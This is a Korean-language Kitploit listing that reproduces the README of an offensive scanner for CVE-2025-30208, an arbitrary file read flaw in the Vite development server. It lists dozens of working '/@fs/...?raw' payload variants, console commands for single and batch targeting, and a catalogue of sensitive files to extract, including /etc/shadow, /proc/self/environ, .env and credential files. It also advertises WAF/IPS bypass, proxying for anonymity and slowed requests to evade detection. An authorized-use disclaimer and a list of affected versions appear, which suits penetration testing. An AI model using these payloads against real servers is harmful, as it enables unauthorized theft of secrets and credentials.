Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-30208 — CVE‑2025‑30208은 Vite 개발 서버(널리 사용되는 프론트엔드 빌드 도구)에서 발생하는 중간 심각도의 임의 파일 읽기 취약점입니다. | Kitploit
도구/GitHubGitHub/themehackers/cve-2025-30208
Vulnerability ScannersPayload GenerationExploitationInformation GatheringWeb SecurityPenetration Testing
GitHubthemehackers/cve-2025-30208

CVE-2025-30208

CVE‑2025‑30208은 Vite 개발 서버(널리 사용되는 프론트엔드 빌드 도구)에서 발생하는 중간 심각도의 임의 파일 읽기 취약점입니다.

저장소 보기
1071년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

🔥 CVE-2025-30208 Vite 임의 파일 읽기 취약점 스캐너

Python License Security Status Modular

CVE-2025-30208을 위한 엔터프라이즈급 기능을 갖춘 고급 취약점 스캐너

Vite 임의 파일 읽기 취약점 탐지를 위한 전문 침투 테스트 도구

🚀 빠른 시작 • 📋 기능 • 🔧 사용법 • 📊 예제 • 🛡️ 보안


📖 개요

이 도구는 Vite 개발 서버의 CVE-2025-30208 취약점을 탐지하고 악용하도록 설계된 종합적인 취약점 스캐너입니다. 이 취약점은 Vite의 파일 시스템 엔드포인트를 통해 임의 파일 읽기 접근을 허용하여 민감한 구성 파일, 소스 코드 및 시스템 정보를 노출할 수 있습니다.

🎯 이 도구가 하는 일

  • 탐지: 네트워크 전체에서 취약한 Vite 인스턴스를 탐지합니다
  • 악용: 임의 파일 읽기 취약점을 안전하게 악용합니다
  • 발견: 민감한 파일과 구성 데이터를 발견합니다
  • 보고: 여러 형식(HTML, JSON, 콘솔)으로 결과를 보고합니다
  • 관리: 스캔 세션과 구성을 관리합니다
  • 오류 처리: 자동 재시도 메커니즘으로 오류를 원활하게 처리합니다
  • 🏗️ 모듈식 아키텍처

    이 도구는 유지보수성과 확장성을 높이기 위해 모듈식 아키텍처를 갖추고 있습니다:

    • CVE-2025-30208.py - 메인 스캐너 애플리케이션
    • payloads.py - 고급 악용 페이로드(60개 이상 변형)
    • sensitive_files.py - 포괄적인 민감 파일 데이터베이스(200개 이상 파일)
    • html_template.py - 향상된 해커 스타일 HTML 보고 템플릿

    🚀 빠른 시작

    사전 요구 사항

    root@kitploit:~
    pip3 install -r requirements.txt
    

    기본 사용법

    root@kitploit:~
    python3 CVE-2025-30208.py
    
    CVE-2025-30208 > set RHOST 192.168.1.100
    CVE-2025-30208 > set RPORT 3000
    CVE-2025-30208 > run
    

    📋 기능

    🔍 핵심 취약점 탐지

    • 60개 이상의 고급 페이로드: 최대 탐지를 위한 포괄적인 악용 기술
    • 스마트 탐지: 오탐(false positive)을 방지하는 지능형 응답 분석
    • 실시간 검증: 대상 응답의 지속적인 검증
    • 종합 테스트: 알려진 모든 취약 엔드포인트 테스트

    🛡️ 강화된 보안 기능

    • 프록시 지원: 익명성을 위한 HTTP/HTTPS 프록시 구성
    • 사용자 지정 헤더: 사용자 지정 HTTP 헤더로 WAF/IPS 우회
    • 속도 제한: 탐지를 피하기 위한 구성 가능한 지연
    • 세션 관리: 스캔 세션 저장 및 복원
    • 입력 검증: 포괄적인 매개변수 검증

    🔧 고급 기능

    • 일괄 스캔: 여러 대상을 멀티스레드로 스캔
    • 민감 파일 발견: 200개 이상의 민감 파일 자동 발견
    • 연결 테스트: TCP/UDP/HTTP/HTTPS 프로토콜 테스트
    • 오류 복구: 지수 백오프(exponential backoff)를 이용한 자동 재시도
    • 종합 로깅: 타임스탬프가 포함된 상세 로그

    📊 보고 및 출력

    • 🎨 향상된 HTML 보고서: 애니메이션이 포함된 아름다운 해커 스타일 취약점 보고서
    • JSON 내보내기: 추가 분석을 위한 구조화된 데이터
    • 콘솔 출력: 색상으로 구분된 실시간 피드백
    • 로그 파일: 상세 감사 추적
    • 대화형 웹 인터페이스: 보고서 열람용 내장 웹 서버

    🔧 사용법 가이드

    1. 기본 구성

    root@kitploit:~
    CVE-2025-30208 > set RHOST 192.168.1.100
    CVE-2025-30208 > set RPORT 3000
    CVE-2025-30208 > set FILEPATH etc/passwd
    
    CVE-2025-30208 > test
    

    2. 취약점 테스트

    root@kitploit:~
    CVE-2025-30208 > run
    
    # Enable verbose mode for detailed output
    CVE-2025-30208 > verbose
    CVE-2025-30208 > run
    

    3. 일괄 스캔

    root@kitploit:~
    CVE-2025-30208 > set THREADS 10
    CVE-2025-30208 > batch
    
    192.168.1.100:3000
    192.168.1.101:3000
    192.168.1.102:3000
    [Press Enter twice to finish]
    

    4. 민감 파일 발견

    root@kitploit:~
    CVE-2025-30208 > scan
    

    5. 고급 구성

    root@kitploit:~
    # Configure proxy
    CVE-2025-30208 > proxy
    Enter proxy: http://127.0.0.1:8080
    
    # Set custom headers
    CVE-2025-30208 > headers
    Enter headers: {"User-Agent": "Custom Scanner"}
    
    # Configure rate limiting
    CVE-2025-30208 > rate
    Enter rate limit: 1.0
    

    6. 향상된 HTML 보고

    root@kitploit:~
    # Generate beautiful HTML report
    CVE-2025-30208 > pull
    
    # Start web server to view report
    CVE-2025-30208 > web
    
    # Start web server on specific port
    CVE-2025-30208 > web 8081
    
    # Stop web server
    CVE-2025-30208 > web off
    

    📊 명령어 참조

    명령어설명예시
    set <option> <value>구성 옵션 설정set RHOST 192.168.1.100
    show options현재 설정 표시show options
    edit대화형 옵션 편집기edit
    run / exploit취약점 테스트 실행run
    batch여러 대상 일괄 스캔batch
    scan민감 파일 발견scan
    pull결과를 HTML/JSON으로 내보내기pull
    web [on|off|port]HTML 보고서용 웹 서버web 8080
    save세션 구성 저장save
    load세션 구성 불러오기load
    test대상 연결 테스트test
    validate현재 구성 검증validate
    verbose상세(verbose) 모드 전환verbose
    proxy프록시 설정 구성proxy
    headers사용자 지정 HTTP 헤더 설정headers
    rate속도 제한 구성rate
    log로깅 정보 표시log
    help / ?도움말 표시help

    ⚙️ 구성 옵션

    옵션설명기본값검증
    RHOST대상 호스트/IP 주소-호스트 이름/IP 검증
    RPORT대상 포트 번호-포트 범위(1-65535)
    FILEPATH테스트할 파일 경로etc/passwd경로 검증
    PROXYHTTP/HTTPS 프록시 URL-URL 형식 검증
    VERBOSE상세(verbose) 출력 활성화false부울(Boolean) 검증
    RATE_LIMIT요청 간 지연(초)0.3숫자 검증
    THREADS일괄 스캔 스레드 수5정수 검증
    TIMEOUT요청 시간 제한(초)5정수 검증
    CUSTOM_HEADERS사용자 지정 HTTP 헤더(JSON){}JSON 형식 검증

    🎨 향상된 페이로드 시스템

    이 스캐너는 payloads.py에 구성된 60개 이상의 다양한 페이로드 변형을 사용합니다:

    기본 @fs 페이로드

    root@kitploit:~
    /@fs/{file_path}?raw??
    /@fs/{file_path}?raw&url
    /@fs/{file_path}?import&raw??
    /@fs/{file_path}?raw&import
    /@fs/{file_path}?import&url
    

    확장 매개변수 변형

    root@kitploit:~
    /@fs/{file_path}?raw&source
    /@fs/{file_path}?raw&content
    /@fs/{file_path}?raw&data
    /@fs/{file_path}?raw&file
    /@fs/{file_path}?raw&type=text
    /@fs/{file_path}?raw&format=text
    /@fs/{file_path}?raw&encoding=utf8
    

    Vite 특정 변형

    root@kitploit:~
    /@fs/{file_path}?raw&vite&dev
    /@fs/{file_path}?raw&vite&hot
    /@fs/{file_path}?raw&vite&hmr
    /@fs/{file_path}?raw&development
    /@fs/{file_path}?raw&debug
    

    모듈 시스템 변형

    root@kitploit:~
    /@fs/{file_path}?raw&esm
    /@fs/{file_path}?raw&cjs
    /@fs/{file_path}?raw&umd
    /@fs/{file_path}?raw&js
    /@fs/{file_path}?raw&ts
    /@fs/{file_path}?raw&json
    /@fs/{file_path}?raw&css
    /@fs/{file_path}?raw&html
    

    대체 엔드포인트

    root@kitploit:~
    /app/{file_path}?raw??
    /App/{file_path}?raw??
    

    🔍 향상된 민감 파일 발견

    이 도구는 sensitive_files.py에 구성된 200개 이상의 민감 파일을 테스트합니다:

    🖥️ 시스템 파일(Linux/Unix)

    • /etc/passwd - 사용자 계정 정보
    • /etc/shadow - 암호화된 비밀번호 데이터
    • /etc/services - 네트워크 서비스
    • /etc/hosts - 호스트 이름 매핑
    • /etc/fstab - 파일 시스템 테이블
    • /etc/ssh/sshd_config - SSH 서버 구성
    • /etc/crontab - 시스템 cron 작업
    • /etc/sudoers - Sudo 구성

    📊 프로세스 정보

    • /proc/version - 커널 버전
    • /proc/cpuinfo - CPU 정보
    • /proc/meminfo - 메모리 정보
    • /proc/self/environ - 프로세스 환경
    • /proc/self/cmdline - 프로세스 명령줄
    • /proc/net/tcp - TCP 연결
    • /proc/net/udp - UDP 연결

    ⚙️ 애플리케이션 구성

    • .env - 환경 변수
    • .env.local - 로컬 환경
    • .env.production - 프로덕션 환경
    • config.json - 애플리케이션 구성
    • settings.json - 애플리케이션 설정
    • application.properties - Spring 구성
    • application.yml - YAML 구성
    • database.yml - 데이터베이스 구성
    • secrets.json - 비밀 관리

    📦 Node.js / JavaScript 파일

    • package.json - Node.js 의존성
    • package-lock.json - 잠긴 의존성
    • yarn.lock - Yarn 잠금 파일
    • vite.config.js - Vite 구성
    • vite.config.ts - TypeScript Vite 구성
    • tsconfig.json - TypeScript 구성
    • webpack.config.js - Webpack 구성
    • next.config.js - Next.js 구성
    • nuxt.config.js - Nuxt.js 구성
    • angular.json - Angular 구성
    • vue.config.js - Vue.js 구성
    • rollup.config.js - Rollup 구성
    • eslint.config.js - ESLint 구성
    • prettier.config.js - Prettier 구성
    • jest.config.js - Jest 구성
    • babel.config.js - Babel 구성
    • tailwind.config.js - Tailwind CSS 구성

    🔧 Git 파일

    • .git/config - Git 구성
    • .gitignore - Git 무시 규칙
    • .gitattributes - Git 속성
    • .gitmodules - Git 서브모듈
    • .git/HEAD - 현재 브랜치
    • .git/logs/HEAD - Git 로그
    • .git/refs/heads/master - 마스터 브랜치
    • .git/refs/heads/main - 메인 브랜치

    📚 문서 파일

    • README.md - 프로젝트 문서
    • CHANGELOG.md - 변경 로그
    • LICENSE - 라이선스 정보
    • CONTRIBUTING.md - 기여 지침
    • AUTHORS - 작성자 정보
    • TODO.md - 할 일 목록
    • ROADMAP.md - 개발 로드맵

    🐳 Docker 파일

    • Dockerfile - Docker 구성
    • docker-compose.yml - Docker Compose
    • docker-compose.override.yml - 재정의 구성
    • .dockerignore - Docker 무시 규칙
    • docker-compose.prod.yml - 프로덕션 구성
    • docker-compose.dev.yml - 개발 구성

    🌐 웹 서버 구성

    • nginx.conf - Nginx 구성
    • apache2.conf - Apache 구성
    • httpd.conf - HTTP 데몬 구성
    • .htaccess - Apache 접근 제어
    • web.config - IIS 구성
    • robots.txt - 검색 엔진 지시문
    • sitemap.xml - 사이트 구조
    • manifest.json - 웹 앱 매니페스트
    • sw.js - 서비스 워커
    • firebase.json - Firebase 구성
    • firebase.rules - Firebase 보안 규칙

    🪟 Windows 파일

    • boot.ini - 부트 구성
    • autoexec.bat - 자동 실행 스크립트
    • system.ini - 시스템 구성
    • win.ini - Windows 구성
    • Users - 사용자 디렉터리
    • Windows - 시스템 파일
    • Program Files - 애플리케이션 디렉터리

    🍎 macOS 파일

    • System - 시스템 파일
    • Library - 라이브러리 파일
    • Applications - 애플리케이션 파일
    • private/etc/hosts - 호스트 파일
    • private/etc/passwd - 사용자 계정

    🗄️ 데이터베이스 파일

    • database.db - SQLite 데이터베이스
    • database.sqlite - SQLite 데이터베이스
    • data.db - 데이터 데이터베이스
    • dump.sql - 데이터베이스 덤프
    • schema.sql - 데이터베이스 스키마
    • migrations - 데이터베이스 마이그레이션

    📝 로그 파일

    • logs - 로그 디렉터리
    • error.log - 오류 로그
    • access.log - 접근 로그
    • app.log - 애플리케이션 로그
    • debug.log - 디버그 로그
    • combined.log - 통합 로그

    💾 백업 파일

    • backup - 백업 디렉터리
    • backup.sql - 데이터베이스 백업
    • backup.zip - 압축 백업
    • dump - 데이터 덤프
    • export - 데이터 내보내기

    🔒 보안 및 인증

    • auth.json - 인증 구성
    • credentials.json - 자격 증명 저장
    • keys.json - 키 관리
    • tokens.json - 토큰 저장
    • jwt.json - JWT 구성
    • oauth.json - OAuth 구성

    🔌 API 및 서비스 파일

    • api.json - API 구성
    • swagger.json - API 문서
    • openapi.json - OpenAPI 사양
    • graphql.json - GraphQL 구성
    • schema.json - API 스키마

    ☁️ 클라우드 및 배포

    • cloudformation.yml - AWS CloudFormation
    • serverless.yml - Serverless 구성
    • terraform.tf - Terraform 구성
    • kubernetes.yml - Kubernetes 구성
    • k8s.yml - Kubernetes 구성

    📊 모니터링 및 분석

    • analytics.json - 분석 구성
    • monitoring.json - 모니터링 설정
    • metrics.json - 메트릭 구성
    • telemetry.json - 원격 측정 데이터

    🎨 향상된 HTML 보고

    이 도구는 이제 다음과 같은 아름다운 해커 스타일 HTML 보고서를 생성합니다:

    ✨ 시각적 기능

    • 매트릭스 스타일 배경: 애니메이션이 적용된 낙하 문자
    • 그라데이션 애니메이션 및 발광 효과
    • 호버 효과가 있는 대화형 요소
    • 모든 기기를 위한 반응형 디자인
    • 보안 전문가에게 최적화된 다크 테마

    📊 대화형 통계

    • 총 누출 수와 노출된 바이트 수를 위한 실시간 카운터
    • 색상 코드가 있는 심각도 표시기
    • 각 누출에 대한 복사 기능
    • 크기와 줄 수가 포함된 콘텐츠 미리보기
    • 상세 분석을 위한 확장 가능한 섹션

    🔧 기술적 기능

    • Google Fonts 통합(JetBrains Mono, Orbitron)
    • CSS 애니메이션 및 전환
    • 향상된 UX를 위한 JavaScript 상호작용
    • 모바일 반응형 디자인
    • 크로스 브라우저 호환성

    🌐 웹 서버 통합

    • 보고서 열람용 내장 HTTP 서버
    • 자동 브라우저 열기
    • 포트 구성 옵션
    • 간편한 시작/중지 명령

    🛡️ 오류 처리 및 복구

    자동 재시도 메커니즘

    • 3회 재시도: 실패한 요청은 자동으로 재시도됩니다
    • 지수 백오프: 재시도 사이의 지연이 점점 늘어납니다
    • 스마트 오류 분류: 오류 유형별로 다른 처리를 수행합니다
    • 원활한 복구: 오류 발생 후에도 도구는 계속 작동합니다

    오류 범주

    • NetworkError: 연결, 시간 초과, 프록시 문제
    • ConfigurationError: 잘못된 설정 및 매개변수
    • ValidationError: 잘못된 입력 매개변수
    • ScannerError: 일반 스캐너 오류

    검증 기능

    • 실시간 입력 검증: 사용 전에 모든 매개변수를 검증합니다
    • 구성 검증: 스캔 전에 전체 구성을 검증합니다
    • 연결 테스트: TCP/UDP/HTTP/HTTPS 프로토콜 테스트
    • 프록시 검증: 프록시 URL 형식 검증

    📁 출력 파일

    파일설명형식
    data_leak.html향상된 해커 스타일 HTML 취약점 보고서HTML
    data_leak.json구조화된 JSON 내보내기JSON
    sensitive_files_discovery.json발견된 민감 파일JSON
    session.json저장된 세션 구성JSON
    logs/cve_2025_30208_YYYYMMDD_HHMMSS.log상세 감사 로그텍스트

    📝 영향을 받는 버전

    🚨 취약한 버전

    root@kitploit:~
    6.2.0 ≤ Vite ≤ 6.2.2
    6.1.0 ≤ Vite ≤ 6.1.1
    6.0.0 ≤ Vite ≤ 6.0.11
    5.0.0 ≤ Vite ≤ 5.4.14
    Vite ≤ 4.5.9
    

    ✅ 영향을 받지 않는 버전

    root@kitploit:~
    Vite ≥ 6.2.3
    6.1.2 ≤ Vite < 6.2.0
    6.0.12 ≤ Vite < 6.1.0
    5.4.15 ≤ Vite < 6.0.0
    4.5.10 ≤ Vite < 5.0.0
    

    🛡️ 보안 및 윤리적 사용

    ⚠️ 중요 보안 참고 사항

    • 승인된 테스트만: 소유했거나 명시적 테스트 권한이 있는 시스템에서만 사용하십시오
    • 책임 있는 공개: 취약점을 시스템 소유자에게 보고하십시오
    • 속도 제한: 대상에 과부하를 주지 않도록 적절한 지연을 사용하십시오
    • 프록시 사용: 적절한 경우 익명성을 위해 프록시 사용을 고려하십시오
    • 법적 준수: 현지 법률과 규정을 준수하십시오

    🔒 모범 사례

    • 테스트 전에 항상 서면 승인을 받으십시오
    • 통제된 환경에서만 사용하십시오
    • 모든 테스트 활동을 문서화하십시오
    • 속도 제한과 시스템 리소스를 존중하십시오
    • 발견 사항을 책임 있게 보고하십시오

    🚀 고급 사용 예제

    예제 1: 종합 네트워크 스캔

    root@kitploit:~
    CVE-2025-30208 > set THREADS 20
    CVE-2025-30208 > set RATE_LIMIT 0.5
    CVE-2025-30208 > set TIMEOUT 10
    CVE-2025-30208 > verbose
    CVE-2025-30208 > batch
    

    예제 2: 프록시를 사용한 은밀한 스캔

    root@kitploit:~
    CVE-2025-30208 > proxy
    Enter proxy: http://127.0.0.1:8080
    CVE-2025-30208 > headers
    Enter headers: {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"}
    CVE-2025-30208 > set RATE_LIMIT 2.0
    CVE-2025-30208 > run
    

    예제 3: 향상된 보고 워크플로우

    root@kitploit:~
    CVE-2025-30208 > set RHOST 192.168.1.100
    CVE-2025-30208 > set RPORT 3000
    CVE-2025-30208 > run
    CVE-2025-30208 > pull
    CVE-2025-30208 > web 8080
    

    예제 4: 민감 파일 발견

    root@kitploit:~
    CVE-2025-30208 > set RHOST 192.168.1.100
    CVE-2025-30208 > set RPORT 3000
    CVE-2025-30208 > scan
    

    🏗️ 프로젝트 구조

    root@kitploit:~
    CVE-2025-30208/
    ├── CVE-2025-30208.py          # Main scanner application
    ├── payloads.py                # Advanced exploitation payloads (60+)
    ├── sensitive_files.py         # Sensitive file database (200+)
    ├── html_template.py           # Enhanced HTML reporting template
    ├── README.md                  # This documentation
    ├── requirements.txt           # Python dependencies
    ├── logs/                      # Log files directory
    ├── data_leak.html            # Generated HTML reports
    ├── data_leak.json            # Generated JSON reports
    └── session.json              # Saved session configurations
    

    🤝 기여

    이 도구를 개선하기 위한 기여를 환영합니다:

    1. 저장소를 포크(Fork) 하십시오
    2. 기능 브랜치를 생성하십시오
    3. 변경 사항을 적용하십시오
    4. 철저히 테스트하십시오
    5. 풀 리퀘스트를 제출하십시오

    기여 분야

    • payloads.py의 새로운 페이로드 변형
    • sensitive_files.py의 추가 민감 파일 패턴
    • html_template.py의 향상된 HTML 템플릿
    • 개선된 오류 처리
    • 성능 최적화
    • 문서 개선

    📄 라이선스

    이 프로젝트는 교육 및 승인된 보안 테스트 목적으로만 라이선스가 부여됩니다.

    ⚠️ 법적 고지: 이 도구는 승인된 보안 테스트 및 연구 목적으로만 사용됩니다. 사용자는 시스템을 테스트하기 전에 적절한 승인을 받았는지 확인할 책임이 있습니다. 저자는 이 도구의 오용에 대해 책임을 지지 않습니다.


    👨‍💻 작성자

    ThemeHackers

    GitHub

    보안 연구원 및 침투 테스터


    ⭐ 이 도구가 도움이 되었다면 별표를 눌러 주세요! ⭐

    보안 커뮤니티를 위해 ❤️로 만들었습니다

    도구 다운로드
    exit / quit
    도구 종료
    exit